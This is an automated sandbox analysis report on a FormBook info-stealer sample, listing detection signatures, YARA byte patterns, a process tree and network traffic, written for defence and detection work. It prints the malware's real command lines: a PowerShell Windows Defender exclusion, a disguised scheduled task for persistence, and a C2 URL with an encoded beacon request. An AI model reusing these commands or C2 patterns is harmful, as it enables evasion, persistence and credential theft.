Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
Analysis ID:755940
MD5:55d6460392408d1325c18b69a91c28e3
SHA1:405847d03be406a0025eda76852dfd46420a8d7a
SHA256:d1e9780a620ddf149c2aed319388bca7ed690c2a58c9ffc8f60b1c4515115dc9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe (PID: 3292 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • powershell.exe (PID: 1012 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1900 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5356 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • FqJXaFxwEj.exe (PID: 5516 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • schtasks.exe (PID: 5080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • FqJXaFxwEj.exe (PID: 5108 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • FqJXaFxwEj.exe (PID: 4460 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.madamkikkiey.net/n2hm/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x102a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x8ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x79cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xeef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1000a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0xb1d9:$sqlite3step: 68 34 1C 7B E1
      • 0xbd51:$sqlite3step: 68 34 1C 7B E1
      • 0xb21b:$sqlite3text: 68 38 2A 90 C5
      • 0xbd96:$sqlite3text: 68 38 2A 90 C5
      • 0xb232:$sqlite3blob: 68 53 D8 7F 8C
      • 0xbdac:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPasteDetects executables potentially checking for WinJail sandbox windowditekSHen
        • 0x2a87a:$v1: SbieDll.dll
        • 0x2a894:$v2: USER
        • 0x2a8a0:$v3: SANDBOX
        • 0x2a8b2:$v4: VIRUS
        • 0x2a902:$v4: VIRUS
        • 0x2a8c0:$v5: MALWARE
        • 0x2a8d2:$v6: SCHMIDTI
        • 0x2a8e6:$v7: CURRENTUSER
        7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPasteDetects executables potentially checking for WinJail sandbox windowditekSHen
          • 0xd0aa:$v1: SbieDll.dll
          • 0xd0c4:$v2: USER
          • 0xd0d0:$v3: SANDBOX
          • 0xd0e2:$v4: VIRUS
          • 0xd132:$v4: VIRUS
          • 0xd0f0:$v5: MALWARE
          • 0xd102:$v6: SCHMIDTI
          • 0xd116:$v7: CURRENTUSER
          0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 3 entries

            Sigma Signatures

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ParentProcessId: 3292, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, ProcessId: 5356, ProcessName: schtasks.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeReversingLabs: Detection: 29%
            Yara detected FormBook
            Source: Yara matchFile source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Antivirus detection for URL or domain
            Source: http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0uAvira URL Cloud: Label: malware
            Source: www.madamkikkiey.net/n2hm/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeReversingLabs: Detection: 29%
            Machine Learning detection for sample
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeJoe Sandbox ML: detected
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.madamkikkiey.net/n2hm/"]}
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.somethingyourselves.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.193.185.8 80
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.madamkikkiey.net/n2hm/
            Source: Joe Sandbox ViewASN Name: EHOSTIDC-AS-KREHOSTICTKR EHOSTIDC-AS-KREHOSTICTKR
            Source: global trafficHTTP traffic detected: GET /n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u HTTP/1.1Host: www.somethingyourselves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.193.185.8 103.193.185.8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:43:45 GMTServer: ApacheContent-Type: text/htmlContent-Length: 1Vary: Accept-EncodingConnection: closeData Raw: 20 Data Ascii:
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.c
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comiv
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 17089-7.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 17089-7.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 17089-7.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 17089-7.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknownDNS traffic detected: queries for: www.somethingyourselves.com
            Source: global trafficHTTP traffic detected: GET /n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u HTTP/1.1Host: www.somethingyourselves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 5616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
